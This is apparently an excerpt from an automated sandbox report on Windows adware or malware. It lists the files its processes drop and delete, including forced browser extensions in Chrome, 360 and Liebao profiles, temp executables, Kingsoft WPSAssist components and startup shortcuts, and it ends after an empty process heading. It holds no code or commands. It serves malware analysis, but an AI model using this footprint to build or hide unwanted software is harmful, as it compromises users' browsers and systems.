%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G0623_s_80314.exe (19594639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Program Files%\jstm\install_1410999454.tmp (6319 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ptc (9 bytes)
%Program Files%\jstm\juese.exe (12289 bytes)
%Documents and Settings%\All Users\Desktop\绝色唐门.lnk (587 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Almanac_clnh_2014.8.3._126cl[1].exe (1947589 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OfficeAssist.0195.80.1015.exe (2265057 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\All Users\Desktop\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ext[1].7z (106408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\OfficeAssist.0195.80.1015[1].exe (2265057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\F0916_s_30897[1].exe (9843602 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\G0623_s_80314[1].exe (19594639 bytes)
%Program Files%\jstm\unist.exe (1624 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Preferences (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (94 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\绝色唐门\绝色唐门.lnk (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\All Users\Start Menu\绝色唐门.lnk (587 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\All Users\Start Menu\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F0916_s_30897.exe (9843602 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\绝色唐门.lnk (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (93 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\绝色唐门.lnk (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\jstm\config.ini (379 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Almanac_clnh_2014.8.3._126cl[2].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\G0623_s_80314[1].exe (0 bytes)
%Program Files%\jstm\install_1410999454.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\F0916_s_30897[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\OfficeAssist.0195.80.1015[2].exe (0 bytes)
%Program Files%\jstm\ptc (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\ext[1].7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ext.7z (0 bytes)

The process OfficeAssist.0195.80.1015.exe:1628 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\v6svc.dll (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\oem.ini (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\OfficeAssist.0195.80.1015.exe (37179 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\v6svc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\oem.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\OfficeAssist.0195.80.1015.exe (0 bytes)

The process OfficeAssist.0195.80.1015.exe:448 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\demo.ppt (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\3.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\6.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_fg.png (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\updateself.exe (2128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\2.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist.dll (7748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility\uninst.exe (5951 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe (3361 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\文档美化大师.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\setup.cfg (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\meihua.exe (2268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\setup.cfg (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\product.xml (334 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\卸载.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\31.png (875 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist64.dll (5900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_bg.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\assistupdate.exe (9662 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\demo.ppt (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\meihua.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\25.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\assistupdate.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\5.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\11.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\10.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist64.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_polish.png (340 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\demo.ppt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\setup.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\feature.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\assistupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_fg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\meihua.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\updateself.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_polish.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist.dll (0 bytes)

The process fm4svr.exe:1392 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\qqtj2[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\qqtj1[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\qqtj1[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (214 bytes)

The Dropped deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\qqtj1[1].htm (0 bytes)

The process fjwyusp.exe:1336 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

